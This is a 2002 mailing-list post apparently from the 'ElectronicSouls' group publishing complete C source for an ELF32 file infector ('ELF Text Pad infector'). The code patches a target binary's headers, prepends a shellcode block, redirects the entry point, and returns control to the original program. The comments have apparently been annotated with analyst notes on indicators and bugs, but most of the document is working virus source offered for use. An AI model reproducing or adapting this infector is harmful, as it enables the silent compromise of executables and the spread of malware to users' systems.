From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Parasite

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

As many have observed, we have only recently become 4553, after losing
our domain (electronicsouls.org).  We don't leak our 4553 codes, because
they are too recent to go public.

Please enjoy.

# cat 4553text-pad-para.c
/*
 *
 * CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONICSOULS CREW !
 * DO NOT FSCKING DISTRIBUTE !!!
 *
 * 0x4553-txt-segment.c
 * (C) BrainStorm  [ElectronicSouls]
 *
 * thanks to SectorX and ghQst!
 * greetz to all ES + old XOR members and void.ru :)
 *
 */

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <elf.h>
#include <unistd.h>

#define VERSION "0.1.b"

/*
 * Insert - rebuild the target file with the payload buffer placed ahead of
 * the original file image.
 *
 *   filename  path that the temporary file is renamed over at the end
 *   fd        descriptor already open on that file (Attach passes the one it
 *             opened O_RDWR, after rewriting the headers in place)
 *   v, len    payload buffer and the number of bytes of it to write
 *
 * Layout of the file produced below:
 *   [0, 400)            first 400 bytes read from fd
 *   [400, 400+len)      len bytes of v
 *   [400+len, ...)      st_size bytes read from offset 0 of fd
 * The only caller in this file passes len == sizeof(v) == 3696, so
 * 400 + 3696 == 4096 and the original image starts exactly 4096 bytes into
 * the new file.
 *
 * Artefacts an analyst can look for:
 *   - a file named "es.vir" in the current working directory while the tool
 *     runs (O_EXCL makes the open fail if that name already exists);
 *   - the target path ends up referring to the newly created file because of
 *     rename(), so it is a different file object than before;
 *   - the file grows by 400 + len bytes.
 *
 * Returns nothing. Every checked call that fails prints through perror() and
 * exits with status 1. read()/write() results are only compared with < 0, so
 * a short transfer is not noticed. Neither es, fd nor woot is released here.
 */
void Insert(char *filename, int fd, char *v, int len)
{
	struct stat st;
	char *woot;
	int es, i;	/* i is declared but never used in this function */

	/* size and mode of the target come from the already-open descriptor */
	if (fstat(fd, &st) < 0) {
        perror("fstat");exit(1);
	}
	printf("-+- Host Size: %i\n", st.st_size);
	/* one buffer large enough for the whole target file */
	woot = (char *)malloc(st.st_size);
	if (woot == NULL) {
	perror("malloc");exit(1);
	}
	/* temporary output in the current directory, created with the target's mode bits */
	es = open("es.vir", O_WRONLY | O_CREAT | O_EXCL, st.st_mode);
	if (es < 0) {
	perror("open");exit(1);}
	if (lseek(fd, 0, SEEK_SET) < 0) {
	perror("lseek");exit(1);
        }
	/* copy the first 400 bytes of the target to the start of the output */
	if (read(fd, woot, 400) < 0) {
	perror("read");exit(1);
        }
        if (write(es, woot, 400) < 0) {
	perror("write");exit(1);
        }
	/* rewind and load the complete target image into memory */
	if (lseek(fd, 0, SEEK_SET) < 0) {
	perror("lseek");exit(1);
        }
	if (read(fd, woot, st.st_size) < 0) {
	perror("read");exit(1);
        }
	/* the payload goes at the current output offset, i.e. right after the 400-byte copy */
	printf("-+- Copying Parasite(%i) at offset %i\n",len, lseek(es, 0, SEEK_CUR));
	if (write(es, v, len) < 0) {
	perror("write");exit(1);
        }
	/* followed by the whole target image, starting again from its byte 0 */
	if (write(es, woot, st.st_size) < 0) {
	perror("write");exit(1);
	}
	/* replace the target path with the rebuilt file */
	if (rename("es.vir", filename) < 0) {
	perror("rename");exit(1);
	}
}

/*
 * Attach - rewrite the ELF32 headers of `filename` in place so that a
 * 4096-byte block can be placed in front of the original image, then call
 * Insert() to build that file.
 *
 *   filename  path of the file to modify (opened O_RDWR here)
 *   v, len    payload buffer and its size, forwarded to Insert()
 *   e         byte offset inside v where the file's original e_entry is stored
 *
 * Header changes made below, all with the constant 4096:
 *   - first PT_LOAD program header whose p_offset is 0: p_vaddr and p_paddr
 *     are lowered by 4096, p_filesz and p_memsz are raised by 4096;
 *   - e_entry is set to that segment's new p_vaddr + 400;
 *   - every later program header except PT_DYNAMIC gets p_offset += 4096
 *     (PT_DYNAMIC entries are skipped entirely);
 *   - every section header gets sh_offset += 4096;
 *   - e_shoff and e_phoff are raised by 4096.
 *
 * What this looks like from the analysis side: the entry point maps to file
 * offset 400 of the first loadable segment, and since every sh_offset was
 * shifted up by 4096, no section header should describe the bytes at that
 * offset. The first PT_LOAD also starts one 4096-byte step lower than it did
 * before, and the file is 4096 bytes longer (with the len used in this file).
 *
 * Nothing here inspects e_ident, so the input is interpreted as ELF32
 * whatever it really is. The header tables are written back to the original
 * file before Insert() runs; if Insert() exits early (for example because
 * "es.vir" already exists) the file is left with rewritten headers only.
 *
 * Returns nothing; a failing checked call prints via perror() and exits 1.
 * fd is not closed in this function.
 */
void Attach(char *filename, char *v, int len, int e)
{
   Elf32_Ehdr ehdr;
   Elf32_Shdr *shdr;
   Elf32_Phdr *phdr;

   char *woot, *sd;
   int i, offset, move = 0, fd;	/* offset is declared but never used */

   fd = open(filename, O_RDWR);
   if (fd < 0) {
   perror("open");exit(1);
   }
   if (read(fd, &ehdr, sizeof(ehdr)) < 0) {      /* read ehdr */
   perror("read");
   exit(1);
   }
    printf("-+- Host Entry Point: %x\n", ehdr.e_entry); /* modify the parasite so it knows the correct re-entry point */
    /* stores the original entry address as 4 bytes at offset e of the payload buffer */
    *(int *)&v[e] = ehdr.e_entry;

      /* load the whole program header table; size is taken from the file's own e_phnum */
      woot = (char *)malloc(sizeof(*phdr)*ehdr.e_phnum);
      if (woot == NULL) {
      perror("malloc");exit(1);
      }
      if (lseek(fd, ehdr.e_phoff, SEEK_SET) < 0) {             /* read phdr's */
      perror("lseek");exit(1);
      }
      if (read(fd, woot, sizeof(*phdr)*ehdr.e_phnum) < 0) {
      perror("read");exit(1);
      }
        phdr = (Elf32_Phdr *)woot;
        for (i = 0; i < ehdr.e_phnum; i++) {
        /* PT_DYNAMIC entries are left untouched */
        if (phdr->p_type != PT_DYNAMIC) {
        /* once the offset-0 PT_LOAD has been seen (move != 0), later entries only get their file offset shifted */
        if (move) { phdr->p_offset += 4096; } else if (phdr->p_type == PT_LOAD && !phdr->p_offset)
        {

	/* grow the segment downward by 4096 so it covers the block that Insert() prepends */
	phdr->p_vaddr -= 4096;
	phdr->p_paddr -= 4096;
	phdr->p_filesz += 4096;
	phdr->p_memsz += 4096;

	/* new entry point: 400 bytes into the enlarged segment, where Insert() writes v */
	ehdr.e_entry = phdr->p_vaddr + 400;
        printf("------------------------------------------------\n");
        printf("-+- Segment type:             %i\n", phdr->p_type);
        printf("-+- Segment file offset:      %i\n", phdr->p_offset);
        printf("-+- Segment virtual address:  0x%x\n", phdr->p_vaddr);
        printf("-+- Segment physical address: 0x%x\n", phdr->p_paddr);
	printf("-+- Segment size in file:     %i\n", phdr->p_filesz);
	printf("-+- Segment size in memory:   %i\n", phdr->p_memsz);
        printf("-+- Segment flags:            %i\n", phdr->p_flags);
        printf("-+- Segment alignment:        %i\n", phdr->p_align);
        printf("------------------------------------------------\n");
	move = 1;
	}
	}
	++phdr;
	}
	/* load the section header table; size is taken from the file's own e_shnum */
	sd = (char *)malloc(sizeof(*shdr)*ehdr.e_shnum);
	/* NOTE(review): this test looks at woot (the program header buffer), not at sd */
	if (woot == NULL) {
	perror("malloc");exit(1);
	}
	if (lseek(fd, ehdr.e_shoff, SEEK_SET) < 0) {              /* read shdr's */
	perror("lseek");exit(1);
	}
	if (read(fd, sd, sizeof(*shdr)*ehdr.e_shnum) < 0) {
	perror("read");	exit(1);
	}
	shdr = (Elf32_Shdr *)sd;
	/* every section's file offset moves up by 4096, without exception */
	for (i = 0; i < ehdr.e_shnum; i++) {
	shdr->sh_offset += 4096;
	++shdr;
	}
	/* write both tables back at their ORIGINAL offsets in the original file */
	if (lseek(fd, ehdr.e_shoff, SEEK_SET) < 0) {
	perror("lseek");exit(1);
	}
	/* the perror label on the two write checks below says "read" */
	if (write(fd, sd, sizeof(*shdr)*ehdr.e_shnum) < 0) {
	perror("read");exit(1);
	}
	free(sd);
	if (lseek(fd, ehdr.e_phoff, SEEK_SET) < 0) {
	perror("lseek");exit(1);
	}
	if (write(fd, woot, sizeof(*phdr)*ehdr.e_phnum) < 0) {
	perror("read");exit(1);
	}
	free(woot);

	/* only now are the table offsets in the ELF header moved by 4096 */
	ehdr.e_shoff += 4096;
	ehdr.e_phoff += 4096;

	/* write the updated ELF header (new e_entry, e_shoff, e_phoff) at offset 0 */
	if (lseek(fd, 0, SEEK_SET) < 0) {
	perror("lseek");exit(1);
	}
	if (write(fd, &ehdr, sizeof(ehdr)) < 0) {
	perror("write");exit(1);
	}
	Insert(filename,fd,v,len);        /* insert the parasite */
}

/*
 * main - command-line entry point: takes exactly one argument, the path of
 * the file to modify, and passes it to Attach() together with the payload
 * buffer v.
 *
 * The payload as listed: it saves six registers, issues one `int $0x80` with
 * eax = 4, ebx = 1, edx = 14 (system call 4 is write on i386 Linux, so 14
 * bytes of the trailing text go to descriptor 1), restores the registers and
 * jumps to the address held in the `movl ..., %ebp` immediate. No other
 * system call appears in the listed bytes.
 *
 * v is declared with 3696 bytes; the bytes after the initializer are zero
 * (standard array initialization). Insert() writes all sizeof(v) bytes after
 * a 400-byte header copy, 4096 bytes in total.
 *
 * Strings useful as indicators: the literal "  0x4553 r0cks!!  \n" is part of
 * v and is therefore written into the output file by Insert(); the banner
 * lines below go to stderr of the tool only.
 *
 * Exit status: 1 on wrong argument count (and on any failure inside
 * Attach()/Insert(), which call exit(1) themselves), 0 otherwise.
 */
int main(int argc, char *argv[])
{
    /* byte offset in v of the 4-byte immediate of `movl $0x0, %ebp`, counted from the listing below; Attach() overwrites it with the file's original e_entry */
    int e = 33;
    char v[3696] =
		"\x57"			/*	pushl  %edi	*/
		"\x56"			/*	pushl  %esi	*/
		"\x50"			/*	pushl  %eax	*/
		"\x53"			/*	pushl  %ebx	*/
		"\x51"			/*	pushl  %ecx	*/
		"\x52"			/*	pushl  %edx	*/
		"\xeb\x1f"		/* jmp msg_jmp		*/
		"\x59"			/* popl %ecx		*/
		"\xb8\x04\x00\x00\x00"	/* movl $4, %eax	*/
		"\xbb\x01\x00\x00\x00"	/* movl $1, %ebx	*/
		"\xba\x0e\x00\x00\x00"	/* movl $14,%edx	*/
		"\xcd\x80"		/* int $0x80		*/
		"\x5a"			/*	popl   %edx	*/
		"\x59"			/*	popl   %ecx	*/
		"\x5b"			/*	popl   %ebx	*/
		"\x58"			/*	popl   %eax	*/
		"\x5e"			/*	popl   %esi	*/
		"\x5f"			/*	popl   %edi	*/
                "\xbd\x00\x00\x00\x00"	/* movl $0x0, %ebp      */
                "\xff\xe5"		/* jmp *%ebp           */
		"\xe8\xdc\xff\xff\xff"	/* call msg_call	*/
		"  0x4553 r0cks!!  \n";

	/* exactly one path argument is required */
	if (argc != 2) {
        fprintf(stderr, "(C) 0x4553 / 0x5435 - 2002\n");
        fprintf(stderr, "usage: %s <host-2-infect> \n",argv[0]);exit(1);
	}

        fprintf(stderr, "\n  [ ElectronicSouls - ELF Text Pad infector ] \n");
        fprintf(stderr, "    Version:   %s \n\n\n",VERSION);
        fprintf(stderr, "-!- Trying to infect: %s \n",argv[1]);
	/* the full buffer size is passed, not just the length of the initialized bytes */
	Attach(argv[1],v,sizeof(v),e);
        fprintf(stderr, "-*- %s is infected!\n",argv[1]);
        printf("------------------------------------------------\n\n");
   exit(0);
}

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Better in bed than Eminem is divineint."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3oHqIMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltSoUAoIHEU2YMEr92
tDi/qnD0L88cpm+UAJ9MjIFhdUybyJQLLIoy1n0vydUdRg==
=uIpS
-----END PGP SIGNATURE-----



